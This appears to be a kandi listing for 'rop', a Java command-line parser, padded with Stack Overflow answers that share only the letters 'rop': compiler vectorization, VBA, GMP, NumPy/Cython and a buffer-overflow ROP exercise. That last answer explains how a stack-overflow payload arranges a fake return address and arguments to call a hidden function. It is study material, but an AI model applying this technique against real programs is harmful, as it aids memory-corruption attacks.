rop | A lightweight command line option parser written in Java | Command Line Interface library
kandi X-RAY | rop Summary
Rop is designed to be minimal yet convenient, and to cover the most common command line parsing use cases. All of these types of command line applications can be built using Rop.
Top functions reviewed by kandi - BETA
- Removes the option prefix from the given string
- Returns an instance of the specified class
Community Discussions
Trending Discussions on rop
QUESTION
I'm trying to make sure gcc vectorizes my loops. It turns out that by using -march=znver1 (or -march=native) gcc skips some loops even though they can be vectorized. Why does this happen?
In this code, the second loop, which multiplies each element by a scalar, is not vectorised:
...ANSWER
Answered 2022-Apr-10 at 02:47
The default -mtune=generic has -mprefer-vector-width=256, and -mavx2 doesn't change that. znver1 implies -mprefer-vector-width=128, because that's the full native width of the HW. An instruction using 32-byte YMM vectors decodes to at least 2 uops, more if it's a lane-crossing shuffle. For simple vertical SIMD like this, 32-byte vectors would be ok; the pipeline handles 2-uop instructions efficiently. (And Zen1, I think, is 6 uops wide but only 5 instructions wide, so max front-end throughput isn't available using only 1-uop instructions.) But when vectorization would require shuffling, e.g. with arrays of different element widths, GCC code-gen can get messier with 256-bit or wider.
And vmovdqa ymm0, ymm1 mov-elimination only works on the low 128-bit half on Zen1. Also, normally using 256-bit vectors would imply one should use vzeroupper afterwards, to avoid performance problems on other CPUs (but not Zen1).
I don't know how Zen1 handles misaligned 32-byte loads/stores where each 16-byte half is aligned but in separate cache lines. If that performs well, GCC might want to consider increasing the znver1 -mprefer-vector-width to 256. But wider vectors mean more cleanup code if the size isn't known to be a multiple of the vector width.
Ideally GCC would be able to detect easy cases like this and use 256-bit vectors there. (Pure vertical, no mixing of element widths, constant size that's a multiple of 32 bytes.) At least on CPUs where that's fine: znver1, but not bdver2, for example, where 256-bit stores are always slow due to a CPU design bug.
You can see the result of this choice in the way it vectorizes your first loop, the memset-like loop, with a vmovdqu [rdx], xmm0. https://godbolt.org/z/E5Tq7Gfzc
So given that GCC has decided to only use 128-bit vectors, which can only hold two uint64_t elements, it (rightly or wrongly) decides it wouldn't be worth using vpsllq / vpaddq to implement qword *5 as (v<<2) + v, vs. doing it with integer in one LEA instruction.
Almost certainly wrongly in this case, since it still requires a separate load and store for every element or pair of elements. (And loop overhead, since GCC's default is not to unroll except with PGO, -fprofile-use. SIMD is like loop unrolling, especially on a CPU that handles 256-bit vectors as 2 separate uops.)
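The strength-reduction identity in question, 5*v == (v << 2) + v, is easy to sanity-check. A short Python snippet (illustrative only, unrelated to GCC's internals) mimics uint64_t wrap-around with a 64-bit mask:

```python
# Check the strength-reduction identity GCC uses: 5*v == (v << 2) + v.
# Masking to 64 bits mimics uint64_t wrap-around semantics.
MASK = (1 << 64) - 1

def times5_shift_add(v):
    """Compute v * 5 via shift-and-add, as vpsllq/vpaddq (or one LEA) would."""
    return (((v << 2) & MASK) + v) & MASK

for v in [0, 1, 7, 2**63, 2**64 - 1, 1234567890123456789]:
    assert times5_shift_add(v) == (v * 5) & MASK
```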
I'm not sure exactly what GCC means by "not vectorized: unsupported data-type". x86 doesn't have a SIMD uint64_t multiply instruction until AVX-512, so perhaps GCC assigns it a cost based on the general case of having to emulate it with multiple 32x32 => 64-bit pmuludq instructions and a bunch of shuffles. And it's only after it gets over that hump that it realizes that it's actually quite cheap for a constant like 5 with only 2 set bits?
That would explain GCC's decision-making process here, but I'm not sure it's exactly the right explanation. Still, these kinds of factors are what happen in a complex piece of machinery like a compiler. A skilled human can easily make smarter choices, but compilers just do sequences of optimization passes that don't always consider the big picture and all the details at the same time.
-mprefer-vector-width=256 doesn't help:
Not vectorizing uint64_t *= 5 seems to be a GCC9 regression
(The benchmarks in the question confirm that an actual Zen1 CPU gets a nearly 2x speedup, as expected from doing 2x uint64 in 6 uops vs. 1x in 5 uops with scalar. Or 4x uint64_t in 10 uops with 256-bit vectors, including two 128-bit stores which will be the throughput bottleneck along with the front-end.)
Even with -march=znver1 -O3 -mprefer-vector-width=256, we don't get the *= 5 loop vectorized with GCC9, 10, or 11, or current trunk. As you say, we do with -march=znver2. https://godbolt.org/z/dMTh7Wxcq
We do get vectorization with those options for uint32_t (even leaving the vector width at 128-bit). Scalar would cost 4 operations per vector uop (not instruction), regardless of 128- or 256-bit vectorization on Zen1, so this doesn't tell us whether *= is what makes the cost-model decide not to vectorize, or just the 2 vs. 4 elements per 128-bit internal uop.
With uint64_t, changing to arr[i] += arr[i]<<2; still doesn't vectorize, but arr[i] <<= 1; does. (https://godbolt.org/z/6PMn93Y5G). Even arr[i] <<= 2; and arr[i] += 123 in the same loop vectorize, to the same instructions that GCC thinks aren't worth it for vectorizing *= 5, just different operands, constant instead of the original vector again. (Scalar could still use one LEA.) So clearly the cost-model isn't looking as far as final x86 asm machine instructions, but I don't know why arr[i] += arr[i] would be considered more expensive than arr[i] <<= 1; which is exactly the same thing.
GCC8 does vectorize your loop, even with 128-bit vector width: https://godbolt.org/z/5o6qjc7f6
QUESTION
I have 2 tabs in Excel and I am fairly new to VBA:
Operations:
Details:
Excel view:
Take a look at this: the DESCRIPTION field from tab "Operations" will contain different "operation codes" (it may contain 1 operation code, 2 operation codes, or many more). Each code is an 11-digit number. The problem is that this field is fixed-width and sometimes an operation code is truncated.
Only numbers with exactly 11 digits must be considered.
I want to achieve this:
The VBA should find every transaction inside the DESCRIPTION cell from tab "Operations" (in this case row 1 contains one transaction, row 2 contains one transaction, and row 3 contains 2 transactions) and only consider the operation codes with 11 digits.
It should copy the number from tab "Operations" and paste it inside column "NUMBER" of tab "DESCRIPTION".
Expected output:
dataset:
...ANSWER
Answered 2022-Feb-22 at 16:32EDIT: made a few changes, including swapping out for a non-regex pattern match (still fast).
Tested on your sample data.
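The answer's pattern-matching approach boils down to one rule: pull out runs of exactly 11 digits and ignore everything else. That extraction rule can be sketched with a regex in Python (the sample strings here are hypothetical, not the poster's data; the actual answer used VBA):

```python
import re

# Match runs of exactly 11 digits: the lookarounds reject digits that are
# part of a longer run, so truncated or overlong numbers are ignored.
ELEVEN_DIGITS = re.compile(r"(?<!\d)\d{11}(?!\d)")

def extract_codes(description):
    """Return every 11-digit operation code found in a description cell."""
    return ELEVEN_DIGITS.findall(description)

# Hypothetical examples: one full code, one truncated code (ignored),
# and a cell containing two codes.
print(extract_codes("PAYMENT 12345678901 REF"))     # ['12345678901']
print(extract_codes("PAYMENT 1234567 TRUNCATED"))   # []
print(extract_codes("11111111111 OP 22222222222"))  # ['11111111111', '22222222222']
```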
QUESTION
The gmp library provides the function void mpf_pow_ui (mpf_t rop, const mpf_t op1, unsigned long int op2) to raise op1 to the power op2 (according to https://gmplib.org/manual/Float-Arithmetic#index-Powering-functions-1).
But the documentation seems to say nothing about it in the C++ interface. I've tried names such as pow, pow_iu, power, but none of them are defined.
Is there a way to raise a float to an exponent (either float or integer) using gmpxx?
...ANSWER
Answered 2022-Jan-11 at 18:51
gmpxx.h contains interfaces to some mathematical operations like sqrt (see line 3341)
QUESTION
I want to display the text file in my C++ program, but nothing appears and the program just ends. I am using a struct here. I previously used this kind of method, but now I am not sure why it isn't working. I hope someone can help me. Thanks a lot.
...ANSWER
Answered 2021-Dec-04 at 11:06
Unfortunately your text file is not a typical CSV file, delimited by some character like a comma. The entries in the lines seem to be separated by tabs, but this is a guess on my part. Anyway, the structure of the source file makes it harder to read.
Additionally, the file has a header, and while reading the first line and trying to read the word "ID" into an int variable, this conversion will fail. The failbit of the stream is set, and from then on all further access to any iostream function for this stream will do nothing. It will ignore all your further requests to read something.
An additional difficulty is that you have spaces in data fields. But the extraction operator for formatted input >> will stop when it sees whitespace, so it may read only half of a field in a record.
Solution: you must first read the header line, then the data rows. Next, you must know whether the file is really tab separated. Sometimes tabs are converted to spaces; in that case, we would need to recreate the start position of each field in a record.
In any case, you need to read a complete line, and after that split it into parts.
For the first solution approach, I assume tab-separated fields.
One of many possible examples:
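The read-a-complete-line-then-split approach described above can be outlined as follows (sketched in Python for brevity, though the answer targets C++; the column names and sample rows are hypothetical):

```python
import io

# Tab-separated input with a header line; data fields may contain spaces.
data = io.StringIO(
    "ID\tName\tScore\n"
    "1\tJohn Doe\t85\n"
    "2\tJane Roe\t92\n"
)

header = data.readline().rstrip("\n").split("\t")  # consume the header first
records = []
for line in data:
    # Read a whole line, then split it on tabs, so embedded spaces
    # inside a field never break the parse.
    fields = line.rstrip("\n").split("\t")
    records.append(dict(zip(header, fields)))

for rec in records:
    print(rec["ID"], rec["Name"], rec["Score"])
```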
QUESTION
I am trying to make a parser for the following recursive datatype:
...ANSWER
Answered 2021-Dec-01 at 05:12The language of expressions that you describe isn't regular. So you'll have to use a different library.
Luckily, essentially the same parser structure should work fine with most other parser combinator libraries. It should be as simple as substituting your new library's name for a few basic parsers in place of their regex-applicative analogs.
QUESTION
TL;DR: I'm performing an array operation (no mathematics) and I've found Cython to be significantly faster. Is there a way I can speed this up in NumPy, or in Cython?
Context
I'm writing a function that is meant to take a subset of an NxN array from index onward in both directions (whose top corner is along the diagonal) and shift it one place upwards along the diagonal. Secondly, I need to shift the top row from index onward one place to the left. Lastly, I need to set the last column in the array to zero after the operation.
The array is a strictly upper triangular matrix, meaning that everything from the diagonal downwards is set to 0. This is my attempt at an elegant way to store historical collision data between pairs of objects (which are represented by indices in the matrix). This would be similar to making a nested list of size n!/(2(n-2)!) which represents the ordered pairs of a list of indices of length n. In this algorithm, I hope to "remove" an object from the collision pairing matrix.
The advantage I find in this implementation is that "removing a collision pair" from the matrix is much less computationally intensive than removing pairs from a nested list and shifting the indices in pairs past the "index to remove" point.
The overall project centers around the automated "packing" of 3D models into a build volume for powder bed fusion additive manufacturing. The algorithm uses simulated annealing, so the ability to prune a collision set, store historical information, and add/remove geometry are of utmost importance and need to be well optimized.
Example
Let's say our array takes this form (not representative of actual data).
...ANSWER
Answered 2021-Nov-25 at 11:30
The reason why the expression arr[index:-1, index:-1] = arr[index + 1:, index + 1:] is slow in both Numpy and Cython while the Cython code is much faster is a bit counter-intuitive: this expression is not efficiently implemented in either Numpy or Cython.
Indeed, Numpy copies the right-hand side (arr[index + 1:, index + 1:]) into a temporary array allocated on the fly. The temporary array is then copied to the left-hand side (arr[index:-1, index:-1]). This means that two memory copies are performed where only one would suffice. It is even worse: the copied memory is pretty big and will not fit in the cache, resulting in a bigger overhead (on some processors, like mainstream x86/x86-64 ones, the write-back policy causes additional slow reads). Moreover, the new temporary array will cause many page faults, slowing down the copy even more.
Numpy does this because the left-hand side and the right-hand side may overlap (which is the case here), and thus the order in which the memory bytes are copied matters a lot. Numpy uses a slow conservative approach rather than an optimized implementation. This is a missed optimization. Cython does exactly the same thing.
Your Cython code does not suffer from all these overheads: it directly copies the array in place relatively efficiently. The values read are kept in the cache and then written just after, so the write-back policy is not an issue. Moreover, there is no temporary array and there are no page faults. Finally, your Cython code does not copy the lower part of the triangular matrix, resulting in fewer bytes copied compared to the expression mentioned previously.
One way to reduce the overhead of the Numpy expression is to copy the matrix chunk by chunk, allocating a small temporary buffer for that (typically a few lines of the matrix). However, this is far from easy, since CPython loops are generally very slow and the chunk size should fit in the cache for the method to be useful.
Further optimization: conditionals are slow. You can remove them by starting the j-based loop at i+1 and ending it at n-1. Another j-based loop can then fill the values beyond n-1. For the same reason, the i-based loop should end at n-1, and another loop can then fill the remaining part of the array. A good compiler should use faster SIMD instructions.
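As a concrete reference for the operation being optimized, here is an in-place version of the shift written with plain Python lists (illustrative only; it follows the question's description as I read it, and a real implementation would use NumPy or Cython as above). The in-place forward loop is safe because each read at (i+1, j+1) stays ahead of the write at (i, j):

```python
def remove_index(arr, index):
    """Remove object `index` from a strictly upper-triangular collision
    matrix: shift the (index.., index..) sub-block up-left along the
    diagonal, shift rows above `index` one column left, and zero the
    stale last row and column."""
    n = len(arr)
    # Shift the sub-block one place up-left. Reads are always ahead of
    # writes, so iterating forward is safe in place.
    for i in range(index, n - 1):
        for j in range(index, n - 1):
            arr[i][j] = arr[i + 1][j + 1]
    # For rows above `index`, shift columns from `index` onward one left.
    for i in range(index):
        for j in range(index, n - 1):
            arr[i][j] = arr[i][j + 1]
    # Zero the last row and column, which now hold stale values.
    for k in range(n):
        arr[k][n - 1] = 0
        arr[n - 1][k] = 0

# Pairs among objects 0..3; removing object 1 keeps pairs among {0, 2, 3}.
m = [[0, 1, 2, 3],
     [0, 0, 4, 5],
     [0, 0, 0, 6],
     [0, 0, 0, 0]]
remove_index(m, 1)
print(m)  # [[0, 2, 3, 0], [0, 0, 6, 0], [0, 0, 0, 0], [0, 0, 0, 0]]
```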
QUESTION
I've been working on the Euler 29 problem for a few days and am having difficulty getting the mpz_t type to work correctly. The objective is to iterate through a^b for values of 2 <= a,b <= 100 and count the nonrepeat values.
Using a vector, I was able to store the values using pointers in an array like so:
...ANSWER
Answered 2021-Nov-19 at 18:03
I figured out that, due to the way mpz_t variables work, the mpz_set function does not work with a pointer to an mpz_t variable as a parameter.
Instead, I was able to get the program to work by assigning the output of the mpz_get_str function to a string and pushing that to a vector of strings to check for repeat values.
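The deduplication idea itself (reduce each a^b to one canonical representation and collect them in a container that rejects repeats) is compact to illustrate in Python, where arbitrary-precision integers are built in; this is a sketch of the counting logic, not the poster's C++/GMP code:

```python
# Project Euler 29: count distinct terms of a**b for 2 <= a, b <= 100.
# The set plays the same role as the poster's vector of mpz_get_str
# strings: each power collapses to a single canonical value, so
# duplicates like 2**4 == 4**2 are counted once.
distinct_powers = {a ** b for a in range(2, 101) for b in range(2, 101)}
print(len(distinct_powers))  # 9183
```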
QUESTION
I'm following this writeup on a buffer overflow of an array on the stack, doing a ROP attack to call a function that wouldn't normally be called.
There are three functions: vuln, flag, and main.
main just calls vuln, and vuln has a stack overflow with 180 bytes.
...ANSWER
Answered 2021-Oct-22 at 14:26
The AAAA are because on entry to flag, it expects the top of the stack to contain its return address, with arguments starting 4 bytes past that. You don't care about flag being able to return, so you just need 4 bytes of garbage in place of the return address.
As for the \r, it isn't between the arguments (they should be adjacent in memory and there can't be any bytes between them); rather, it is actually the first (least-significant) byte of the second argument. The ASCII carriage return \r has numerical value 0x0d, so your arguments are 0xdeadbeef, 0xc0ded00d. I don't know why they wrote the low byte as \r instead of \x0d, which would have been more consistent. Maybe it was automatically translated from binary to hex escapes by some program.
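The byte-level point, that \r is just the little-endian low byte of 0xc0ded00d, can be checked directly. A sketch of the classic 32-bit call-with-arguments payload layout in Python (the flag address here is a hypothetical placeholder, not the write-up's actual value; the 180-byte overflow size comes from the question):

```python
import struct

PADDING = b"A" * 180             # filler up to the saved return address
FLAG_ADDR = 0x080491E2           # hypothetical address of flag()
FAKE_RET = b"AAAA"               # flag()'s "return address": 4 bytes of garbage
ARG1, ARG2 = 0xDEADBEEF, 0xC0DED00D

# Stack layout after the overflow: padding | &flag | fake return | arg1 | arg2
payload = (PADDING
           + struct.pack("<I", FLAG_ADDR)
           + FAKE_RET
           + struct.pack("<II", ARG1, ARG2))

# The least-significant byte of 0xc0ded00d is 0x0d, i.e. ASCII '\r',
# which is why the write-up's payload shows a literal \r there.
print(struct.pack("<I", ARG2)[:1])  # b'\r'
```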
QUESTION
As a simplified example, consider this table with two fields. One is a string and the other is XML.
...ANSWER
Answered 2021-Sep-01 at 12:52
It looks like you want to pull out the inner text of the ParameterList node inside the XML. You can use .value and XQuery for this:
QUESTION
Below is my JSON response:
...ANSWER
Answered 2021-Jul-10 at 10:06
Your src attribute for the img tag will be something like this
Community Discussions, Code Snippets contain sources that include Stack Exchange Network
Vulnerabilities
No vulnerabilities reported